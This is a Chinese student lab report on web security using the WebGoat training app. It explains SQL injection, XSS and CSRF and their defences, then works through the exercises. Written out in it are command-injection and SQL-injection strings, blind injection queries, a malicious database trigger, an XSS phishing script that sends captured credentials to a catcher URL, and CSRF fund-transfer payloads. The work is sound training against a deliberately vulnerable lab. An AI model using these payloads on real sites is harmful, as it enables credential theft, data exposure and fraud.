2018-2019-2 网络对抗技术 20165301 Exp 9 Web安全基础
2018-2019-2 网络对抗技术 20165301 Exp 9 Web安全基础
基础问题回答
-
1.SQL注入攻击原理,如何防御?
- SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
- sql注入攻击是利用是指利用设计上的漏洞,在目标服务器上运行Sql语句以及进行其他方式的攻击,动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。如:在用户名、密码登输入框中输入一些',--,#等特殊字符,实现引号闭合、注释部分SQL语句,利用永真式实现登录、显示信息等目的。
- 防御:关闭或删除不必要的交互式提交表单页面;
对漏洞注入点相关代码进行关键字的过滤(如:利用正则表达式),以规范代码安全性;
不要在服务器端放置备份的文件以免受到感染,或备份的文件含有漏洞,造成切入点;
将数据库里的内容进行加密处理使其不具有特殊的意义。
-
2.XSS攻击的原理,如何防御?
- 原理:XSS:跨站脚本。攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本(如:html标签或者javascript代码)的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
- 防御:
- 用户角度:提高防范意识,不要轻易输入个人信息,如用户名密码;
- 网页制作者角度:
- 对输入和URL参数进行过滤
- 在输出数据之前对潜在的威胁的字符进行编码、转义
-
3.CSRF攻击原理,如何防御?
- 原理:
- CSRF :跨站请求伪造。
- CSRF就是冒名登录。跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况Session都是存在Cookie中.攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器.
- 主要是当访问网站A时输入用户名和密码,在通过验证后,网站A产生Cookie信息并返回,此时登录网站A成功,可正常发送请求到网站A。在未退出网站A前,若访问另一个网站B,网站B可返回一些攻击性代码并请求访问网站A;因此在网站B的请求下,向网站A发出请求。但网站A不知道该请求恶意的,因此还是会执行该恶意代码
- 防御:
- 验证请求中的Token
- 验证 Referer
- 添加加随机验证
- 设定cookie域
- 原理:
实践过程记录
安装Webgoat
-
下载安装包
-
用
netstat -tupln | grep 8080
查看端口是否被占用,如果被占用,用kill 进程号终止占用8080端口的进程。 -
普通安装,命令行输入
java -jar webgoat-container-7.0.1-war-exec.jar
-
浏览器转:
localhost:8080/WebGoat
直接用默认用户名密码登录即可,开始练习
SQL注入攻击
- 右键点击页面,选择inspect Element审查网页元素对源代码进行修改,在复选框中任意一栏的代码,右键单击后,选择Edit At Html进行修改,添加"& netstat -an & ipconfig"
- 点击view,可以看到执行指令后的网络端口使用情况和IP地址。攻击成功!
数字型注入(Numeric SQL Injection)
-
概念:注入数字型数据(如:永真式)达到注入的效果。
-
原理:在station字段中注入特征字符,组合成新的SQL语句。
如:SELECT * FROM weather_data WHERE station = [station] -
目标:该例子通过注入SQL字符串查看所有的天气数据。
-
操作方法:
- 右键点击页面,选择inspect Element审查网页元素对源代码进行修改,在选中的城市编号Value值中添加or 1=1
- 右键点击页面,选择inspect Element审查网页元素对源代码进行修改,在选中的城市编号Value值中添加or 1=1
-
显示所有城市的天气情况,攻击成功!
日志欺骗(Log Spoofing)
-
概念:通过在日志文件中插入脚本实现欺骗。
-
原理:在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹
-
目标:灰色区域代表在 Web 服务器的日志中的记录的内容,我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”
-
操作方法:
-
利用入回车(0D%)和换行符(%0A),在 username 中填入
ctf%0d%0aLogin Succeeded for username: admin
-
攻击者可以利用这种方式向日志文件中添加恶意脚本,脚本的返回信息管理员能够通过浏览器看到。比如,将
admin <script>alert(document.cookie)</script>
作为用户名输入,可以看到弹窗的cookie信息
-
SQL 注入(LAB: SQL Injection)
-
Stage 1: 字符串型注入(Stage 1: String SQL Injection)
-
原理:通过注入字符串绕过认证
-
操作方法:
- 右键点击页面,选择inspect Element审查网页元素对源代码进行修改,将password密码框的最大长度限制改为18。
- 以用户Neville(admit)登录,输入密码
hello' or '1' = '1
- 以用户Neville(admit)登录,输入密码
-
Stage 3: 数字型 SQL 注入(Stage 3: Numeric SQL Injection)
-
原理:通过注入数字型数据,绕过认证,可以通过普通员工的账户,查看到BOSS的用户信息。
-
操作方法:
- 使用用户名 Larry,密码 larry 点击login登录,点击ViewProfile查看用户信息
-
右键点击页面,选择inspect Element审查网页元素源代码,我们可以看到数据库索引的依据是员工ID,推测返回的是每次查询到的第一条数据。
-
用社会工程学解释老板应该是工资最高的,所以将员工ID的value改成101 or 1=1 order by salary desc,使得老板的信息作为查询到的第一条数据。
-
攻击成功
字符串注入(String SQL Injection)
-
概念:通过注入字符串绕过认证
-
原理:基于以下查询语句构造自己的 SQL 注入字符串。
SELECT * FROM user_data WHERE last_name = '?'
-
目标:下面的表格,允许用户查看他们的信用卡号码。尝试通过 SQL 注入将所有信用卡信息 显示出来。尝试的用户名是“Smith”。
-
操作方法:
- 输入查询的用户名
Smith' or 1=1--
(Smith 和1=1都成了查询的条件,而1=1是恒等式,因此能查询到表里面的所有数据) - 得到所有用户的信用卡号码,攻击成功!
- 输入查询的用户名
数据库后门(Database Backdoors)
-
原理:数据库通常作为一个 Web 应用程序的后端来使用。此外,它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另 一个数据库操作,如 insert, select, update or delete。举个例子:攻击者可以创建一个触发器, 该触发器在创建新用户时,将每个新用户的 Email 地址设置为攻击者的地址。
-
目标:利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库,不支持触发器,所以该课程不会真正完成。 我们的 Login ID 是 101。
-
操作方法:
-
输入101,得到该用户的信息。我们可以看到,输入的语句没有验证,很容易进行 SQL 注入
-
输入注入语句101; update employee set salary=18000执行两个语句
-
输入101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='ctf20165301@hackme.com'WHERE userid = NEW.userid
- BEFORE/AFTER参数指定了触发执行的时间,在事件之前或是之后
- FOR EACH ROW表示任何一条记录上的操作满足触发事件都会触发该触发器,也就是说触发器的触发频率是针对每一行数据触发一次
-
数字型盲注入(Blind Numeric SQL Injection)
-
原理:某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
-
目标:该题目允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。我们找到 pins 表中 cc_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int,整型。输入找到的数值并提交,通过该题目。
-
操作方法:
-
本题目中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN数值。但我们可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;
-
如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用 AND 函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐 号有效,否则无效。
-
例如:输入查询语句101 AND 1=1,因为两个条件都成立,所以页面返回帐号有效
-
输入查询语句101 AND 1=2,因为第二个条件不成立,所以而页面返回帐号无效
-
针对查询语句的后半部分构造复杂语句,如:101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 );如果提示无效,则pin值小于5000,使用二分法,最终得出pin的值为2364
-
字符串型盲注入(Blind String SQL Injection)
-
原理:与数字型盲注入类似,某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
-
目标:找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本题目。
-
操作方法:
- 与数字型盲注入类似,只是将注入的数字换为字符串而已
- 例如:输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'M' );取得 pin 字段数值的第一个字母,并判断其是否比字母“M”小
- SUBSTRING 语法为 SUBSTRING(STRING,START,LENGTH)
- 同样使用二分法进行测试,最后得到pin字段为Jill
XSS攻击(Cross‐Site Scripting)
跨站脚本攻击是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。
XSS 钓鱼(Phishing with XSS)
(1) Phishing with XSS 跨站脚本钓鱼攻击
-
点击Cross-Site Scripting (XSS) Phishing with XSS
-
利用XSS可以在已存在的页面中进一步添加元素,包括两部分:
- 受害人填写一个表格;
- 服务器以读取脚本的形式,将收集到的信息发送给攻击者。
-
编写一段脚本读取被攻击者在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息的 WebGoat
-
编写一个带用户名和密码输入框的表格
//脚本
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
//表格
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
存储型XSS攻击(Stored XSS Attacks)
- 在title中任意输入字符,留言板中输入
<script>alert("I am 20165301ctf. You've been attacked!!!");</script>
反射型XSS攻击(Reflected XSS Attacks)
- 输入代码
<script>alert("You've been attacked!!!");</script>
,点击purse的同时页面就给出了反馈
CSRF攻击
跨站请求伪造(Cross Site Request Forgery (CSRF))
- 查看页面右侧Parameters中的src和menu值,分别为267和900
- 在title中输入任何参数,message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=267&menu=900&transferFunds=5000" width="1" height="1"
/>,以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的(宽高设置成1像素的目的是隐藏该图片),用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交 - 在Message List中生成以Title命名的消息。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。可以从左侧的任务栏看到任务已完成。
绕过 CSRF 确认( CSRF Prompt By‐Pass)
- 查看页面右侧Parameters中的src和menu值分别为270和900
并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=270&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=270&menu=900&transferFunds=CONFIRM"> </iframe>
- 在Message List中生成以Title命名的链接,点击进入后,攻击成功,可以从左侧的任务栏看到任务已完成。
实验总结与体会
实验内容好多啊。。。webgoat真厉害